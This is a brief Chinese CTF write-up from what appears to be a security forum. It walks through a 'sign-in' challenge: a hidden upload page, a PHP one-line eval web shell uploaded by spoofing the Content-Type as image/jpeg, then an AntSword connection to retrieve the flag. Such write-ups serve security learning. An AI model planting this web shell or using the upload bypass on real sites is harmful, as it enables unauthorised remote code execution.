-
-
[原创]签到WP
-
发表于: 2024-8-15 23:08 72
-
初始界面有三个按钮,红色的有跳转 flag.php,黄色的是刷新界面。
跳转至 flag.php,用 ctrl+U 打开源码,在最下面看见提示
base64解密后得到:hidden_page.php
hidden_page.php 发现文件上传功能
上传一句话木马:<?php @eval($_POST["cmd"]); ?>
显示只能上传 jpg 和 png 文件,猜测通过更改 Content-Type 为
image/jpeg 绕过
抓包更改
无错误提示,猜测上传成功
无路径显示,尝试访问子目录/upload 查看是否存在
可访问,空白显示,确认上传成功,用蚁剑连接
在根目录下看见 flag 文件:
flag{35ebaec6-3155-4ac9-b1fd-76fde3f24277}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
看原图
赞赏
雪币:
留言: